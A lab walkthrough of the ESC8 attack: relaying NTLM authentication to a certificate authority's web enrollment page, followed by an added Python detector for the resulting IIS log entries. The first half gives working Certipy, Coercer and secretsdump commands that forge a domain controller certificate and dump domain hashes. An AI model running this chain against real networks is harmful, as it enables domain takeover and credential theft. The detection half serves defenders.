ESC8

ADCS abuse with NTLM Relay

NTLM relay is a man-in-the-middle attack in which the attacker impersonates the server towards the client and the client towards the server. ADCS supports certificate enrollment over HTTP, which allows users to request certificates through a web interface.

HTTP NTLM authentication can be relayed to a certificate enrollment interface. The CA's web enrollment service provides web pages for interacting with the CA, usually at http://<servername>/certsrv/certfnsh.asp. These endpoints can be abused through sessions authenticated via NTLM relay.

ESC8 Abuse

Start the relay listener with Certipy

sudo certipy relay -target 172.16.19.5 -template DomainController

Then coerce authentication from the target using PrinterBug, PetitPotam or Coercer.

coercer coerce -l 172.16.19.19 -t 172.16.19.3 -u blwasp -p 'Password123!' -d lab.local -v

Authenticate with the obtained certificate

certipy auth -pfx lab-dc.pfx

DCSync with the resulting ticket

KRB5CCNAME=lab-dc.ccache secretsdump.py -k -no-pass lab-dc.lab.local
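From the defender's side, the relay chain above leaves a trace in the IIS logs of the CA web enrollment site: a successful POST to /certsrv/certfnsh.asp authenticated as a machine account (name ending in "$") over plain HTTP. The following script is an added example, not part of the original page or of Certipy; it parses constructed IIS W3C log lines (the field layout and all values are made up for this example) and flags such enrollments. The heuristic that machine accounts do not normally enroll through the web interface, and the use of port 80 as the indicator of plain HTTP, are assumptions of this example.

```python
"""Flag suspicious ADCS web-enrollment activity in IIS W3C logs (added example)."""
from dataclasses import dataclass

# Constructed sample of IIS W3C log lines from the CA web enrollment site.
# Field order follows the "#Fields:" header; all values are made up.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2024-05-01 10:00:01 172.16.19.5 GET /certsrv/certrqus.asp - 80 LAB\\blwasp 172.16.19.19 200
2024-05-01 10:00:05 172.16.19.5 POST /certsrv/certfnsh.asp - 80 LAB\\blwasp 172.16.19.19 200
2024-05-01 10:01:10 172.16.19.5 POST /certsrv/certfnsh.asp - 80 - 172.16.19.19 401
2024-05-01 10:01:11 172.16.19.5 POST /certsrv/certfnsh.asp - 80 LAB\\LAB-DC$ 172.16.19.19 200
"""

# Endpoint that finalizes a certificate request (from the page).
ENROLL_ENDPOINT = "/certsrv/certfnsh.asp"


@dataclass
class Finding:
    time: str
    user: str
    client_ip: str
    reason: str


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if fields is None or len(parts) != len(fields):
            continue  # skip lines that do not match the declared layout
        yield dict(zip(fields, parts))


def successful_enrollments(text):
    """Return records for successful POSTs to the enrollment endpoint."""
    return [
        rec for rec in parse_w3c(text)
        if rec["cs-uri-stem"].lower() == ENROLL_ENDPOINT
        and rec["cs-method"] == "POST"
        and rec["sc-status"] == "200"
    ]


def find_machine_account_enrollments(text):
    """Flag enrollments by machine accounts (assumption: machine accounts
    autoenroll over RPC/DCOM, so a web enrollment by one is suspicious)."""
    findings = []
    for rec in successful_enrollments(text):
        user = rec["cs-username"]
        if user.endswith("$"):
            findings.append(Finding(
                time=f'{rec["date"]} {rec["time"]}',
                user=user,
                client_ip=rec["c-ip"],
                reason="machine account enrolled via web interface",
            ))
    return findings


def count_plain_http_enrollments(text, http_port="80"):
    """Count successful enrollments served on the plain-HTTP port: each one
    shows NTLM enrollment is possible without TLS, the precondition for ESC8."""
    return sum(1 for rec in successful_enrollments(text) if rec["s-port"] == http_port)


if __name__ == "__main__":
    for f in find_machine_account_enrollments(SAMPLE_LOG):
        print(f"{f.time} {f.user} from {f.client_ip}: {f.reason}")
    print("enrollments over plain HTTP:", count_plain_http_enrollments(SAMPLE_LOG))
```

In the sample, the machine-account finding points at the relayed enrollment for LAB-DC$; the plain-HTTP count is a configuration signal that web enrollment still accepts NTLM without TLS, which is what makes the relay work in the first place.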
